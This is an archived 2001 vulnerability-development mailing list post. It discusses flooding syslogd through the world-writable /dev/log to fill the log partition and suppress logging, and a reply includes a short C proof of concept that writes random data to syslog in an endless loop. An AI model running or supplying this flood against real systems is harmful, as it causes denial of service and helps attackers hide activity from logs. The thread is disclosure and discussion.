Vulnerability Development mailing list archives
Re: Possible syslogd DoS ?
From: "VeNoMouS" <venom () phreaker net>
Date: Thu, 4 Oct 2001 18:37:20 +1200
well that wouldnt work to well as syslog likes to do "message repeating X number of times" , so trying to fill it up would prove boring and pointless. but yea u could do it simple like this #include <stdio.h> #include <syslog.h> main() { FILE *fp; char buffer[1024]; printf("Starting Dos..\n"); if((fp=fopen("/dev/urandom","r"))==NULL) { printf("Error Opening /dev/urandom\n"); exit(0); } for(;;) { fgets(buffer,sizeof(buffer),fp); buffer[strlen(buffer)-1]='\0'; syslog(0,buffer,strlen(buffer)); } } something as simple as that works, but for some reason when i run it on my box it seems to exit after awhile even tho i capture all signal's maybe syslog() has a exit() in the function , i cant be bothered looking into it, i did this code on the fly for proof of concept ----- Original Message ----- From: Petr Baudis <pasky () pasky ji cz> To: <vuln-dev () securityfocus com> Sent: Thursday, October 04, 2001 6:09 AM Subject: Possible syslogd DoS ?
Hello, I just recently came on a thought (thanks to Marek Jaros) of possible DoS of syslogd. It uses /dev/log for receiving log messages, which has mode 0666 on most linuxes. It should be ok, as many non-root applications should be allowed to log things etc. But imagine that you will send a lot of very long messages there,
different
everytime in order not to get stripped into kinda 'message repeated x
times'.
In this way, you can imho flood syslogd successfully, possibly filling
whole
partition where /var/log resides, regardless to your quota settings on the machine! Then, if /var/log is not on separate partition, the whole system can get into serious problems, and especially, further events won't be obviously logged, so you can do evil things there happily and nobody will know about
it.
Discussion? Something i didn't take into account? Possible solutions? -- Petr "Pasky" Baudis . n = ((n >> 1) & 0x55555555) | ((n << 1) & 0xaaaaaaaa); n = ((n >> 2) & 0x33333333) | ((n << 2) & 0xcccccccc); n = ((n >> 4) & 0x0f0f0f0f) | ((n << 4) & 0xf0f0f0f0); n = ((n >> 8) & 0x00ff00ff) | ((n << 8) & 0xff00ff00); n = ((n >> 16) & 0x0000ffff) | ((n << 16) & 0xffff0000); -- C code which reverses the bits in a word. . My public PGP key is on: http://pasky.ji.cz/~pasky/pubkey.txt -----BEGIN GEEK CODE BLOCK----- Version: 3.12 GCS d- s++:++ a--- C+++ UL++++$ P+ L+++ E--- W+ N !o K- w-- !O M- !V PS+ !PE Y+ PGP+>++ t+ 5 X(+) R++ tv- b+ DI(+) D+ G e-> h! r% y? ------END GEEK CODE BLOCK------
Current thread:
- Possible syslogd DoS ? Petr Baudis (Oct 03)
- Re: Possible syslogd DoS ? Crist J. Clark (Oct 04)
- Re: Possible syslogd DoS ? VeNoMouS (Oct 04)
- Re: Possible syslogd DoS ? VeNoMouS (Oct 04)
- Re: Possible syslogd DoS ? Petr Baudis (Oct 04)
- Re: Possible syslogd DoS ? Petr Baudis (Oct 05)
- Re: Possible syslogd DoS ? H D Moore (Oct 05)
- Re: Possible syslogd DoS ? Tim Walberg (Oct 05)
- Re: Possible syslogd DoS ? Petr Baudis (Oct 05)
- AnalogX Proxy SMTP server relay Claymore (Oct 05)
- Re: AnalogX Proxy SMTP server relay Joe Stewart (Oct 06)
- Re: Possible syslogd DoS ? Robert van der Meulen (Oct 04)
- Re: Possible syslogd DoS ? White Vampire (Oct 04)